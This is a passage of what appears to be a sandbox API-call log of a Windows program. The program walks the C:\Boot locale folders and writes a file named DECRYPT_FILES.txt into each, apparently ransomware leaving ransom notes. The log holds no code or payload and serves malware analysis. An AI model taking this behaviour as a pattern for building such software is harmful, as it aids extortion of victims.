lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.447] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.447] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.447] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.448] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.448] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0052.448] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0052.448] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.448] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.448] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.448] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0052.448] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.449] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0052.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0052.449] CreateFileW (lpFileName="C:\\Boot\\el-GR\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\el-gr\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3e4 [0052.449] GetFileType (hFile=0x3e4) returned 0x1 [0052.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0052.449] GetFileType (hFile=0x3e4) returned 0x1 [0052.449] WriteFile (in: hFile=0x3e4, lpBuffer=0x216c840*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x216c840*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0052.450] CloseHandle (hObject=0x3e4) returned 1 [0052.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.450] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0052.450] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0052.450] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.511] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.511] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.511] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0052.511] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.511] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.512] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0052.512] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0052.512] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.512] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.512] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0052.512] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0052.512] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0052.513] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0052.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0052.513] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0052.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0052.513] CreateFileW (lpFileName="C:\\Boot\\en-US\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\en-us\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3dc [0052.516] GetFileType (hFile=0x3dc) returned 0x1 [0052.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0052.516] GetFileType (hFile=0x3dc) returned 0x1 [0052.516] WriteFile (in: hFile=0x3dc, lpBuffer=0x21996f8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21996f8*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0052.517] CloseHandle (hObject=0x3dc) returned 1 [0052.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0052.517] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0052.517] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0052.517] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0053.947] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.948] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0053.948] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.948] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0053.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0053.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0053.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0053.948] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0053.948] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0053.948] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0053.948] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0053.949] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0053.949] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0053.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0053.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0053.949] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0053.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0053.949] CreateFileW (lpFileName="C:\\Boot\\es-ES\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\es-es\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3e4 [0053.950] GetFileType (hFile=0x3e4) returned 0x1 [0053.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0053.950] GetFileType (hFile=0x3e4) returned 0x1 [0053.950] WriteFile (in: hFile=0x3e4, lpBuffer=0x21a5050*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21a5050*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0053.951] CloseHandle (hObject=0x3e4) returned 1 [0053.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0053.952] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0053.952] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0053.952] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0053.952] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.952] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0053.952] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.953] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0053.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0053.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0053.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0053.953] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0053.953] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0053.953] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0053.953] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, 